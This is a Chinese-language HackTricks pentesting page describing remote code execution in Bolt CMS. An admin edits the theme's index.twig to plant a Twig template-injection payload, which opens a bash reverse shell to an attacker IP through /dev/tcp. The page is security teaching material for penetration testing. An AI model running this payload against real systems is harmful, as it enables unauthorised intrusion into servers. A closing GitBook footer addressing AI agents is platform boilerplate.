> For the complete documentation index, see [llms.txt](https://hacktricks.xsx.tw/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacktricks.xsx.tw/network-services-pentesting/pentesting-web/bolt-cms.md).

# Bolt CMS

<details>

<summary><strong>从零开始学习AWS黑客技术，成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS红队专家）</strong></a><strong>！</strong></summary>

支持HackTricks的其他方式：

* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。

</details>

## RCE

在以管理员身份登录后（转到 /bot 以访问登录提示），您可以在Bolt CMS中获得RCE：

* 选择 `Configuration` -> `View Configuration` -> `Main Configuration` 或转到URL路径 `/bolt/file-edit/config?file=/bolt/config.yaml`
* 检查主题的值

<figure><img src="/files/f8XJXvqeBZlCaXIBG54C" alt=""><figcaption></figcaption></figure>

* 选择 `File management` -> `View & edit templates`
* 选择前一步中找到的主题基础（在这种情况下为 `base-2021`）并选择 `index.twig`
* 在我的情况下，这在URL路径 /bolt/file-edit/themes?file=/base-2021/index.twig 中
* 通过[模板注入（Twig）](/pentesting-web/ssti-server-side-template-injection.md#twig-php)在此文件中设置您的有效负载，例如：`{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}`
* 然后保存更改

<figure><img src="/files/oJa2wiqCkvpMmYzA35IT" alt=""><figcaption></figcaption></figure>

* 在 `Maintenance` -> `Clear the cache` 中清除缓存
* 以普通用户身份再次访问页面，有效负载应该被执行


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://hacktricks.xsx.tw/network-services-pentesting/pentesting-web/bolt-cms.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.